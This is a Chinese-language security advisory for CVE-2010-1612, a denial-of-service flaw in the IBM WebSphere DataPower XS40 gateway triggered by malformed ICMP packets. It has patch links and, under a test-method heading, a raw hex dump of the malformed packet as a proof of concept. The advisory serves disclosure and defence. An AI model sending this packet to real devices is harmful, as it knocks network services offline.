发布日期：2010-01-26
更新日期：2010-01-27

受影响系统：

IBM WebSphere DataPower XML Security Gateway XS40 3.7.2.1

不受影响系统：

IBM WebSphere DataPower XML Security Gateway XS40 3.8.0.0

描述：

---

BUGTRAQ  ID: 37952
CVE ID: CVE-2010-1612

IBM WebSphere DataPower XML Security Gateway XS40是一种1U机架式安装的网络设备，能够简化、加速和帮助保证面向服务架构（SOA）的安全。

远程攻击者可以通过向Datapower XS40设备的QLOGIC接口发送畸形ICMP报文导致接口速度变慢，直至拒绝服务。

<*来源：ErikA
  
  链接：http://marc.info/?l=bugtraq&m=126452587626269&w=2
        http://www-01.ibm.com/support/docview.wss?rs=2362&uid=swg1IC61364
        http://secunia.com/advisories/38256/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

00 14 5e a1 b2 c3 00 11 25 82 7b 02 08 00 45 00
00 50 4b 94 00 00 ff 01 5e f1 ac 12 65 15 00 00
00 00 03 01 06 f6 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00
00 20 ed 58 00 00 ff 11 a9 d4 ac 12 65 15 ac 12
65 65 01 00 00 00 29 00 cd 00 00 08 00 00

建议：

---

厂商补丁：

IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www-01.ibm.com/support/docview.wss?rs=0&uid=swg24024770
http://www-01.ibm.com/support/docview.wss?rs=0&uid=swg24024773

浏览次数：2714
严重程度：0（网友投票）